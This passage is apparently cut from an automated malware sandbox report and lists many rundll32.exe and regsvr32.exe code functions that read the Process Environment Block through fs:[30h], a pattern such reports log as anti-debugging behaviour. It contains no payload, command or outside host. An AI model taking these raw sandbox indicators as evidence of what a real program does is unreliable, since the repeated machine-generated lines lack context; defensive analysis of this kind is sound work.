                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2BE250 mov edx, dword ptr fs:[00000030h]4_2_7F2BE250
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B4280 mov edx, dword ptr fs:[00000030h]4_2_7F2B4280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B4280 mov ecx, dword ptr fs:[00000030h]4_2_7F2B4280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B4280 mov ecx, dword ptr fs:[00000030h]4_2_7F2B4280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B4280 mov ecx, dword ptr fs:[00000030h]4_2_7F2B4280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B4280 mov ecx, dword ptr fs:[00000030h]4_2_7F2B4280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B4280 mov edx, dword ptr fs:[00000030h]4_2_7F2B4280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B42E4 mov edx, dword ptr fs:[00000030h]4_2_7F2B42E4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B42E4 mov ecx, dword ptr fs:[00000030h]4_2_7F2B42E4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov edx, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov ecx, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov eax, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov eax, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov eax, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov eax, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov eax, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov edx, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC160 mov eax, dword ptr fs:[00000030h]4_2_7F2CC160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DC170 mov eax, dword ptr fs:[00000030h]4_2_7F2DC170
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DE1B0 mov eax, dword ptr fs:[00000030h]4_2_7F2DE1B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA0A4 mov ecx, dword ptr fs:[00000030h]4_2_7F2CA0A4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA0A4 mov edx, dword ptr fs:[00000030h]4_2_7F2CA0A4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71AF60 mov eax, dword ptr fs:[00000030h]6_2_7F71AF60
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F8F30 mov edx, dword ptr fs:[00000030h]6_2_7F6F8F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F8F30 mov ecx, dword ptr fs:[00000030h]6_2_7F6F8F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F8F30 mov ecx, dword ptr fs:[00000030h]6_2_7F6F8F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F6F1A mov eax, dword ptr fs:[00000030h]6_2_7F6F6F1A
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F47D4 mov ecx, dword ptr fs:[00000030h]6_2_7F6F47D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F47D4 mov ecx, dword ptr fs:[00000030h]6_2_7F6F47D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F47D4 mov edx, dword ptr fs:[00000030h]6_2_7F6F47D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F7407C8 mov ecx, dword ptr fs:[00000030h]6_2_7F7407C8
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F717660 mov ecx, dword ptr fs:[00000030h]6_2_7F717660
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F72F610 mov eax, dword ptr fs:[00000030h]6_2_7F72F610
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6FD6C0 mov edx, dword ptr fs:[00000030h]6_2_7F6FD6C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F715EC0 mov ecx, dword ptr fs:[00000030h]6_2_7F715EC0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov eax, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov edx, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov eax, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov eax, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov eax, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov eax, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov eax, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov ecx, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov edx, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB0 mov eax, dword ptr fs:[00000030h]6_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71E690 mov ecx, dword ptr fs:[00000030h]6_2_7F71E690
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F6E80 mov eax, dword ptr fs:[00000030h]6_2_7F6F6E80
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71A560 mov ecx, dword ptr fs:[00000030h]6_2_7F71A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71A560 mov eax, dword ptr fs:[00000030h]6_2_7F71A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71A560 mov ecx, dword ptr fs:[00000030h]6_2_7F71A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71ADB0 mov edx, dword ptr fs:[00000030h]6_2_7F71ADB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6FE5A0 mov eax, dword ptr fs:[00000030h]6_2_7F6FE5A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F727D90 mov ecx, dword ptr fs:[00000030h]6_2_7F727D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F727D90 mov edx, dword ptr fs:[00000030h]6_2_7F727D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F727D90 mov eax, dword ptr fs:[00000030h]6_2_7F727D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F727D90 mov ecx, dword ptr fs:[00000030h]6_2_7F727D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F6C70 mov edx, dword ptr fs:[00000030h]6_2_7F6F6C70
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F702420 mov edx, dword ptr fs:[00000030h]6_2_7F702420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F702420 mov eax, dword ptr fs:[00000030h]6_2_7F702420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F705CD0 mov ecx, dword ptr fs:[00000030h]6_2_7F705CD0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6FD370 mov edx, dword ptr fs:[00000030h]6_2_7F6FD370
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov ecx, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov eax, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov ecx, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov edx, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov eax, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71E3A0 mov eax, dword ptr fs:[00000030h]6_2_7F71E3A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov ecx, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov eax, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov edx, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov eax, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov ecx, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6FE250 mov edx, dword ptr fs:[00000030h]6_2_7F6FE250
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F702A20 mov eax, dword ptr fs:[00000030h]6_2_7F702A20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F747A0D mov eax, dword ptr fs:[00000030h]6_2_7F747A0D
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F42E4 mov edx, dword ptr fs:[00000030h]6_2_7F6F42E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F42E4 mov ecx, dword ptr fs:[00000030h]6_2_7F6F42E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F72D0 mov edx, dword ptr fs:[00000030h]6_2_7F6F72D0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F719A90 mov eax, dword ptr fs:[00000030h]6_2_7F719A90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov edx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov ecx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov ecx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov ecx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov ecx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov edx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71C170 mov eax, dword ptr fs:[00000030h]6_2_7F71C170
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov edx, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov ecx, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov edx, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F7479DC mov eax, dword ptr fs:[00000030h]6_2_7F7479DC
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71E1C0 mov edx, dword ptr fs:[00000030h]6_2_7F71E1C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71E1B0 mov eax, dword ptr fs:[00000030h]6_2_7F71E1B0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F747998 mov eax, dword ptr fs:[00000030h]6_2_7F747998
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F728870 mov ecx, dword ptr fs:[00000030h]6_2_7F728870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F728870 mov edx, dword ptr fs:[00000030h]6_2_7F728870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F728870 mov eax, dword ptr fs:[00000030h]6_2_7F728870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F728870 mov ecx, dword ptr fs:[00000030h]6_2_7F728870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov ecx, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov ecx, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0D6C0 mov edx, dword ptr fs:[00000030h]11_2_7EC0D6C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC25EC0 mov ecx, dword ptr fs:[00000030h]11_2_7EC25EC0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC06E80 mov eax, dword ptr fs:[00000030h]11_2_7EC06E80
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2E690 mov ecx, dword ptr fs:[00000030h]11_2_7EC2E690
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov edx, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov ecx, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov edx, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC27660 mov ecx, dword ptr fs:[00000030h]11_2_7EC27660
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC3F610 mov eax, dword ptr fs:[00000030h]11_2_7EC3F610
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC507C8 mov ecx, dword ptr fs:[00000030h]11_2_7EC507C8
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC047D4 mov ecx, dword ptr fs:[00000030h]11_2_7EC047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC047D4 mov ecx, dword ptr fs:[00000030h]11_2_7EC047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC047D4 mov edx, dword ptr fs:[00000030h]11_2_7EC047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2AF60 mov eax, dword ptr fs:[00000030h]11_2_7EC2AF60
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC06F1A mov eax, dword ptr fs:[00000030h]11_2_7EC06F1A
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC08F30 mov edx, dword ptr fs:[00000030h]11_2_7EC08F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC08F30 mov ecx, dword ptr fs:[00000030h]11_2_7EC08F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC08F30 mov ecx, dword ptr fs:[00000030h]11_2_7EC08F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC15CD0 mov ecx, dword ptr fs:[00000030h]11_2_7EC15CD0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC06C70 mov edx, dword ptr fs:[00000030h]11_2_7EC06C70
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC12420 mov edx, dword ptr fs:[00000030h]11_2_7EC12420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC12420 mov eax, dword ptr fs:[00000030h]11_2_7EC12420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC37D90 mov ecx, dword ptr fs:[00000030h]11_2_7EC37D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC37D90 mov edx, dword ptr fs:[00000030h]11_2_7EC37D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC37D90 mov eax, dword ptr fs:[00000030h]11_2_7EC37D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC37D90 mov ecx, dword ptr fs:[00000030h]11_2_7EC37D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0E5A0 mov eax, dword ptr fs:[00000030h]11_2_7EC0E5A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2ADB0 mov edx, dword ptr fs:[00000030h]11_2_7EC2ADB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2A560 mov ecx, dword ptr fs:[00000030h]11_2_7EC2A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2A560 mov eax, dword ptr fs:[00000030h]11_2_7EC2A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2A560 mov ecx, dword ptr fs:[00000030h]11_2_7EC2A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC072D0 mov edx, dword ptr fs:[00000030h]11_2_7EC072D0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC042E4 mov edx, dword ptr fs:[00000030h]11_2_7EC042E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC042E4 mov ecx, dword ptr fs:[00000030h]11_2_7EC042E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov edx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov ecx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov ecx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov ecx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov ecx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov edx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC29A90 mov eax, dword ptr fs:[00000030h]11_2_7EC29A90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0E250 mov edx, dword ptr fs:[00000030h]11_2_7EC0E250
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov ecx, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov eax, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov edx, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov eax, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov ecx, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC57A0D mov eax, dword ptr fs:[00000030h]11_2_7EC57A0D
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0DA10 mov edx, dword ptr fs:[00000030h]11_2_7EC0DA10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0DA10 mov eax, dword ptr fs:[00000030h]11_2_7EC0DA10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC12A20 mov eax, dword ptr fs:[00000030h]11_2_7EC12A20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov ecx, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov eax, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov ecx, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov edx, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov eax, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2E3A0 mov eax, dword ptr fs:[00000030h]11_2_7EC2E3A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0D370 mov edx, dword ptr fs:[00000030h]11_2_7EC0D370
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC38870 mov ecx, dword ptr fs:[00000030h]11_2_7EC38870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC38870 mov edx, dword ptr fs:[00000030h]11_2_7EC38870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC38870 mov eax, dword ptr fs:[00000030h]11_2_7EC38870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC38870 mov ecx, dword ptr fs:[00000030h]11_2_7EC38870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov ecx, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov ecx, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2E1C0 mov edx, dword ptr fs:[00000030h]11_2_7EC2E1C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC579DC mov eax, dword ptr fs:[00000030h]11_2_7EC579DC
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC57998 mov eax, dword ptr fs:[00000030h]11_2_7EC57998
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2E1B0 mov eax, dword ptr fs:[00000030h]11_2_7EC2E1B0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov edx, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov ecx, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov edx, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2C170 mov eax, dword ptr fs:[00000030h]11_2_7EC2C170
